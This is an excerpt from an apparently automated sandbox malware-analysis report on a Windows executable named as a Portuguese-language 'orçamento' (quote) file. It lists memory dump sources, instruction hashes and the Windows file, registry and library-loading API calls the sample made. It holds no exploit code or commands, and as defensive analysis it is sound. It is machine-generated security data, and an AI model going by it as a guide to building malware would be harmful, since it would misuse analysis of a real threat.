                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                                          • Opcode ID: 92ab2df8331217a59a17599f40ffe36fb639f1bdbb8a7e9334f9d6b9ff154f8a
                                                                                                                                                                                                                          • Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92ab2df8331217a59a17599f40ffe36fb639f1bdbb8a7e9334f9d6b9ff154f8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1214770103-0
                                                                                                                                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000003CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                          • Opcode ID: 72679c68904c0da51367ebbef88f38aa05796d10a352d8d827880ed32402d475
                                                                                                                                                                                                                          • Instruction ID: 9e7747ffe68dd38d2e91679843896ff1bba49b3e2177530597f16d8d521728a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72679c68904c0da51367ebbef88f38aa05796d10a352d8d827880ed32402d475
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47119E31911205EBEB10CFA0CA489AEB7B4EF44354B20843FE046B72C0DAB89A41EB19
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                                                                                          • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                                            • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                                                                            • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                                                                            • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                                                                                          • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                                          • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040570F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                                                                                          • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                                                                                                            • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                                                          • Opcode ID: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
                                                                                                                                                                                                                          • Instruction ID: 961aab187d6e804d52bb1e41e5d93eaf0119f522ae0a1b5a30e902dd9b89f162
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04871601514EFDB01AF959E49DAF7769DB40328B14043BF501F00E1CA7D8C419E2D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                                          • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                                          • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,000003CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                                                                                                                                                                                          • Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
